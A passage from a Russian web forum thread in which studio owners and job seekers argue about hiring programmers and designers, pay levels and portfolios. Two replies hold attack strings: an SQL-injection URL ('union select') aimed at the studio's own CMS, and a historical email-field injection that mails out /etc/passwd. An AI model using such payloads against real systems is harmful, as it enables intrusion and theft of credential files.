продолжения им работы (зачисление в образовательное учреждение, выход
на пенсию и другие случаи), а также в случаях установленного нарушения
работодателем законов и иных нормативных правовых актов, содержащих
нормы трудового права, условий коллективного договора, соглашения или
трудового договора работодатель обязан расторгнуть трудовой договор в
срок, указанный в заявлении работника.
     До истечения срока предупреждения об увольнении работник имеет
право в любое время отозвать свое заявление. Увольнение в этом случае
не производится, если на его место не приглашен в письменной форме
другой работник, которому в соответствии с настоящим Кодексом и иными
федеральными законами не может быть отказано в заключении трудового
договора.
     По истечении срока предупреждения об увольнении работник имеет
право прекратить работу. В последний день работы работодатель обязан
выдать работнику трудовую книжку, другие документы, связанные с
работой, по письменному заявлению работника и произвести с ним
окончательный расчет.
     Если по истечении срока предупреждения об увольнении трудовой
договор не был расторгнут и работник не настаивает на увольнении, то
действие трудового договора продолжается.

спустя 2 минуты [обр] Антон Гусев(0/19)[досье]
Федченко Алексей[досье], мечты, как правило, ими и остаются. И только. :)
спустя 3 минуты [обр] Кирилл [Kirk] Королев(0/673)[досье]

Федченко Алексей[досье]
А претензии-то у вас какие? Хороших работников мало? Ну так это не секрет.
А то, что люди требуют больше денег, чем стоят, или то, что приходят не те - так это, в общем, проблема вашего подхода к совершению сделки между работодателем (вами) и работником.

Dag[досье] у вас еще и дисграфия к тому же?

спустя 11 минут [обр] Антон Гусев(0/19)[досье]

Dag[досье], кстати, по поводу, "гениев" и "работяг":

Четкий выбор: у Вас два дизайнера: один экстра класса и его веб-проекты смотрятся шикарно и вызывают повышенный интерес но он "с характером" и второй, просто "хороший" дизайнер и нормальный парен (девушка). Ваши действия? Попытаетесь договориться с первым или возьмете второго? Ваш продукт, имхо, как веб-дизайнерской студии, это то что Вы сделали (портфолио) и это единственно что потенциальный клиент увидит. Все остальное... клиента не интересует.

Я не берусь утверждать, что сказанное ниже - закон, но для организации процесс т.с. выживания - это не только завоевание клиента, но и достижение баланса во внутренних отношениях. Посему "гении с характером", как правило, не нужны. Для приглашения такого человека должна быть осознанная необходимость, ибо это кризисный управляющий.

спустя 19 минут [обр] Dag+(0/43)[досье]
Это я к тому, что не надо вырывать из контекста одну цитату ... там есть другие

Понял. Но я же постнул то что мне кажется красивым... и о курение мне понравилось:))

А предъявлять требования к потенциальным сотрудникам я могу какие угодно

Абсолютно никаких пока он не сотрудник. Вы можете четко и по существу описать предлагаемую вакансию и только, а это разные веши. Все остальное: это интервью... потом испытательный срок...

Выяснять, почему хочет уйти и помочь решить проблему

Тут позицию не понимаю: уйти от вас или уйти к вам? Если человек решил уволиться, пусть уходить. Вы никогда, никого не сможете задержать а и не надо. Уважат решения других так как уважаете свои решения. Только... будет ли человек приезжать на работу еще месяц (или две недели - спасибо Антону) - это уже не он будет решат.

Цель всегда одна: получить от сотрудника все самое лучшее на что он способен а этого не добьешься никаким давлением или силой. На вопрос кого бы выбрали, так и не ответили?

спустя 3 часа 53 минуты [обр] Сергей Сирик(8/737)[досье]

Dag[досье]
Сейчас обоих бы взял :))) Тоже имеем жестокий кадровый дефицит ... А кого брать - просчитать экономичскую эффективность любого из вариантов достаточно легко, вот и весь критерий выбора. Если уж надо таки выбирать.

Вы никогда, никого не сможете задержать

"Никогда не говори никогда" :). Смогу, проверено :)

спустя 10 минут [обр] arto(0/494)[досье]
Сергей Сирик[досье]
really? :)
в 88 или 89 году, после всех выставок, на которых за русское искусство платили неплохие деньги, одни московские бандиты взяли в плен одного художника — приковали к батарее и сказали — пиши картины. освободили с милицией.
спустя 41 минуту [обр] Сергей Сирик(8/737)[досье]
Алексей, я кажет узрел один из корней проблемы - некий ажиотаж на ИТ-рынке труда ... Не упомню такого количества вакансий в этом вот разделе, далеко не относящемуся к известным "трудовым" ресурсам, однако ж.
спустя 3 минуты [обр] Дмитрий Росляков(0/177)[досье]

Федченко Алексей[досье]

Спрашиваю всех, кто ищет или собирается искать работу - вы правда думаете, что на вопрос "Собираетесь ли вы у нас работать постоянно?" можно ответить "Нууууу, не знаааюююю...". После этого я обычно заканчиваю интервью. Зачем тратить мое и ваше время.

А если человек спросит у вас: "Если я буду у вас работать постоянно, вы гарантируете мне постоянно растущую зарплату, интересную работу, нормальный коллектив, отсутствие кретинов среди руководства?"
Что вы ответите? И стоит ли человеку продолжать с вами разговор после вашего ответа?

спустя 10 часов [обр] Федченко Алексей[досье]

Дмитрий Росляков[досье]
>>А если человек спросит у вас: "Если я буду у вас работать постоянно, вы гарантируете мне постоянно растущую >>зарплату, интересную работу, нормальный коллектив, отсутствие кретинов среди руководства?"
>>Что вы ответите? И стоит ли человеку продолжать с вами разговор после вашего ответа?

Я отвечу (и отвечаю, так как мне задают эти вопросы), что рост зарплаты зависит от скорости работы коллектива и своевременности сдачи заказов. А заказов, как я писал выше, у нас хватает. То есть возможность роста зарплаты есть. Интересность работы? Если человек претендует на конкретную вакансию, значит работа для него интересна по умолчанию. Нормальный коллектив гарантировать не могу, так как у нас не такое большое кол-во претендентов, чтобы выбирать совместимых по психологическим признакам. Отсутствие кретинов среди руководства - тонкий момент. Пока еще никто на собеседовании не спрашивал "А у вас в руководстве есть кретины?". И сам подход мне не нравится. Если человек имеет право задать такой вопрос, то и я могу спросить его "А вы, случаем, не кретин?". Но мне такое пока в голову не приходило.

Сергей Сирик[досье]
>>Алексей, я кажет узрел один из корней проблемы - некий ажиотаж на ИТ-рынке труда ...
>>Не упомню такого количества вакансий в этом вот разделе, далеко не относящемуся к
>>известным "трудовым" ресурсам, однако ж.
Согласен. Еще 2 месяца назад я фильтровал резюме на job.ru. Если бы приглашал всех, кто публикуется, то проводил бы 20-30 собеседований в день. А сейчас, если убрать всех, с кем я уже разговаривал, остается 2-3 новых человека на каждую вакансию в день. Наверное, сезонный спад.

Жду гневных реплик от Дмитрия Попова, который обязательно найдет и в этом моем сообщении криминал.

спустя 2 часа 27 минут [обр] Владимир Палант(0/4445)[досье]
Федченко Алексей[досье]
Вы, наверное, сами слишком давно искали работу, поэтому и не понимаете, о чем говорит Дмитрий Росляков[досье]. Из вашего объявления с минимумом текста и получасового разговора человек просто не может понять, интересна ли ему работа и захочет ли он у вас остаться (тут важны и многие другие вопросы, часть которых Дмитрий Росляков[досье] перечислил - конечно же так прямо спрашивать у вас никто не станет). Мне сложно себе представить, как человек может с чистой совестью ответить на ваш вопрос: "Да, конечно".
спустя 12 минут [обр] Федченко Алексей[досье]
Владимир Палант[досье]Я искал работу ровно 3 месяца назад и нашел ее за 1 день. Но в данном форуме я выступаю с позиций менеджера, а оппоненты (за небольшим исключением) - с позиций работника. Поэтому мое понимание - это понимание организатора, которому необходимо запустить и раскрутить проект, а понимание претендентов - как подороже себя продать (не вижу в этом ничего плохого). Поэтому и возникло взаимное непонимание.
спустя 1 час 53 минуты [обр] Александр Лукьянов(0/781)[досье]
Федченко Алексей[досье]
А Вы не пробовали выходить на контакт с разнообразными образовательными учреждениями? По идее, как студенты старших курсов, так и сами учреждения должны быть заинтересованы в будущем трудоустройстве? К тому же (предположительно) их подготовка должна быть выше, а самомнение - ниже :)
спустя 1 час 15 минут [обр] Alex Shubnikov(0/53)[досье]
Федченко Алексей[досье]
Извините, конечно, может я не совсем в тему пишу....
У меня такое ощущение, что вы вполне можете брать на работу самых стандартных программистов(нв счет дизайнеров не могу судить). Ваши сайты (я смотрел сайты из вашего портфолии) подвержены SQL-инъекии. По крайне мере 2 из 4. Если хотите разъяснений, то пожалуйста оставляйте свой контактный e-mail я с вами свяжусь при первой возможности
спустя 1 час 22 минуты [обр] Федченко Алексей[досье]

Александр Лукьянов[досье]Пытался, но не очень интенсивно. Тема для размышлений...

Alex Shubnikov[досье]А мне и нужен программист со стандартными знаниями. Единственное требование - понимание построения систем CMS, так как в планах студии - написание собственной системы управления контентом.

спустя 51 минуту [обр] Alex Shubnikov(0/53)[досье]

Федченко Алексей[досье]
Интересно, я заглянул в Ваш прайс... =) Занятно- с одной стороны Вы не хотите платить своим работникам высокую зарплату, а с другой стороны расценки у Вас вполне себе ничего. Чего стоит съемка фотоаппаратом- 2 часа 200 уе =) В общем цены правильные. Интересно, а долго ли Вы выбирали
программистов для работы? Судя по работе не так долго. Чтоб не быть голословным приведу пример работы Вашей студии. Классическая SQL-инъекция, правда без последствий, я все же порядочный человек =)

http://cms.corvin.com/install_......union+select+*+from+tbl_groups

Вот по-этому я предлагаю Вам пересмотреть Ваш взгляд на программистов. Глядишь и на них Вы будете обращать большее внимание =)

спустя 13 минут [обр] Федченко Алексей[досье]

Alex Shubnikov[досье]А что вы имеете в виду под "обращать большее внимание на программистов"?

>>Интересно, я заглянул в Ваш прайс... =) Занятно- с одной стороны Вы
>>не хотите платить своим работникам высокую зарплату, а с другой стороны
>>расценки у Вас вполне себе ничего.
Я нигде не упоминал, что не хочу платить высокую зарплату. Я отмечал, что хочу платить зарплату, соответствующую квалификации работника, которая зачастую была завышена самим претендентом при устройстве на работу.

>>Чего стоит съемка фотоаппаратом- 2 часа 200 уе =)
Это означает постановочную съемку со светом с выездом на территорию заказчика.

А по поводу SQL-инъекции прошу написать поподробнее на адрес alexei@number.ru, так как разработчик программы клялся, что он круче всех и проблем не будет. Прошу консультации.

спустя 35 минут [обр] Alex Shubnikov(0/53)[досье]
Федченко Алексей[досье]
По поводу инъекции все видно из ссылки- надо тип данных проверять, которые приходят в GET переменных. Это вроде как основы о которых на этом форуме особо и не говорят, отсылают к RTFM.
А внимание я Вам предлагаю обращать такое же, как Вы обращаете на дизайнеров, то есть анкетировать по 100 чел. в месяц и отбирать достойных. Вы скорее всего выбрали программистов, исходя из 200-300 уе в месяц. Обычно, по опыту, это студенты 5 курса какого-нить вуза. Код в их стиле =)
спустя 47 минут [обр] Федченко Алексей[досье]
Alex Shubnikov[досье]Этому программисту было много лет и зарплату потребовал $800 минимум.
спустя 20 часов [обр] SHillA(0/-1)[досье]

Немного оффтопика по поводу sql injections.
Я думал, что на тему таких ошибок отсмеялись уже давно даже начинающие программисты-студенты ;)
Такие ошибки известны очень давно, еще в 1996 году юные хакеры, найдя скрипт, отсылающий почту прыгали до потолка и плясали танцы дикарей. Тогда это решалось просто, в поле e-mail указывалась строка типа такой:
super@hacker.com;mail vasya@pupkin.net < /etc/passwd
Файлы passwd тогда еще не были shadow.
А на сегодня этим sql injection грешат многие разработки, например широкоизвестные PHPbb и Nuke-based системы - просто находка для юных(и не очень) вандалов.

2 Федченко Алексей: я так понял вы из Москвы? Только москвичи не упоминают свой город, наверное думают что интернета дальше МКАД не существует ;)
Если да, то 800 баксов за опытного программера - это плевок на его седины.

А вообще за 1.5K $ дизайнера вы найдете без проблем, и если будете его беречь, он проработает у вас долго и продуктивно на радость вам и акционерам вашей компании. Но не стоит тогда тратить время на тех, кто просит 500 - у них уровень не тот, профессионал почти всегда знает себе цену.

спустя 1 день 19 часов [обр] Федченко Алексей[досье]
SHillA[досье]Про SQL injections уже почитал.
Лично я не из Москвы, но студия московская. Опытный программер:) может зайти на наш сайт, который упоминается в данной теме и в разделе "Контакты" сориентироваться на местности:)
спустя 1 день 22 часа [обр] Андрей Новиков(5/1242)[досье]
Готовьтесь к тому, что "понимание построения систем CMS" тянет в Москве на $2000.
спустя 2 часа 22 минуты [обр] Кирилл [Kirk] Королев(0/673)[досье]
Андрей Новиков[досье] вашими бы устами - да мёд пить =)
спустя 1 день 21 час [обр] Андрей Новиков(5/1242)[досье]
Кирилл [Kirk] Королев[досье], уговорили, от $1500 :)
спустя 4 минуты [обр] Андрей Новиков(5/1242)[досье]
Кирилл [Kirk] Королев[досье], в тему: http://xpoint.ru/forums/thread/26402.xhtml - и это только "натягивальщик", а не архитектор.
спустя 1 месяц 10 дней [обр] Phlinten(0/14)[досье]
А всё нехорошее из за таких, как Алексей и происходит.Видите ему портфолио нужно.Его ведь еще сделать нужно.а как сделать? свой хоум пейдж клепать неохота.глупо.а без портфолио не берут.бред вообще какой то.впринципе готов работать и за 180 баксов,это типа для Питера.за меньшие деньги просто нереально работать,иначе с голоду точно спухнешь.каждый работадатель просит порфолио.бред.
спустя 6 часов [обр] Федченко Алексей[досье]
Больные эти работодатели... Порфолио какое-то просят.
спустя 4 часа 3 минуты [обр] Дмитрий Попов(0/509)[досье]

Да, постинг флинта особенно в тему.

Phlinten[досье] Что бы сделать портфолио, зачастую приходится начинать со 100 долларов в месяц и на полный рабочий день без обеда. Либо иметь, как минимум, вышку, что бы претендовать на 150-200. Собственно сужу по своему опыту. А если не можете, потому как "за меньшие деньги просто нереально работать,иначе с голоду точно спухнешь", то лучше всего идти работать грузчиком, да. Там и зарплаты зачастую гораздо большие, да.

спустя 1 день 18 часов [обр] Phlinten(0/14)[досье]
Дмитрий Попов[досье]собственно, и перебиваемся на других работах.и ЗП там выше указанных 150-200,правда не намного,но выше.А как вы бы прожили на 100 баков,мне бы очень хотелось посмотреть.А лучше реалити шоу,проживи на сто у.е из которох 1000р коммунальные услуги и 400 р проездной.удачи)А с вышкой,да еще и на 150 баков.Из моих знакомых врядли кто пойдет.что зря 5 лет учились?да еще и без обеда.
спустя 26 минут [обр] Phlinten(0/14)[досье]

К размышлению:
вакансия на джоб ру. от 15 числа этого месяца
Зарплата: 150 $ в месяц

Требования:
Знание основ HTML/DHTML; Умение программировать на любом из языков программирования; Желание и стремление к самообучаемости; Рекомендуется наличие элементарных навыков работы в Adobe Photoshop;

эта же вакансия но уже от 16 числа.
Зарплата: 50 $ в месяц.

может вообще нестоит ничего платить?

спустя 5 часов [обр] Федченко Алексей[досье]
Должен заметить, что в нашей студии еще никто не получал меньше $300, и зарплата ни разу не была задержана.
спустя 1 день 12 часов [обр] Phlinten(0/14)[досье]
Федченко Алексей[досье]Вам значит повезло.А что касается портфолио,я вообще не про дезигнера говорил.Взять,скажем верстальщика.Дайте макет,сверстаю и все будут довольны.Какое нафиг портфолио.
спустя 9 часов [обр] Михаил Кюршин aka ya-ya(0/414)[досье]
Phlinten[досье]
В любой профессии есть место для портфолио. В принципе, портфолио может быть даже у ассенизатора.
Это по моему скромному мнению.
спустя 58 минут [обр] Dag+(0/43)[досье]
Какое нафиг портфолио.
Согласен с Вами Флинт. Но Вы должны понят другое:
Факт 1: работодатели портфолио просят.
Факт 2: у Вас его нет.
Вы теперь подумайте что Вы для себя сделали а что нет те. принципиально, любите ли Вы себя или нет. Если да, так сделайте его. Надо - так надо. Подход важен: есть проблемы которые в Ваших силах решит (как портфолио, чистые ботинки...) и такие, решение которых не в Ваших руках (цвет глаз, длина носа, возраст...).
спустя 40 минут [обр] Дмитрий Попов(0/509)[досье]

Phlinten[досье]
Через некоторое время поймете, наверное. Я помнится тоже когда-то не понимал, зачем нужно портфолио. Ну, собственно, сейчас мне в голову не придет брать на работу человека без портфолио. Ибо теорию можно учить сколько угодно, но только практика может научить.

Что касается верстальщиков - да, теоретически, человек и без порфтолио может нормально верстать. Однако строчка про портфолио отметет кучу людей которые верстать не умеют. Остальным же я просто дам сделать тестовое задание.

спустя 1 год 1 месяц [обр] Андрей Новиков(5/1242)[досье]
М Перенесено из форума "Работа::Вакансии"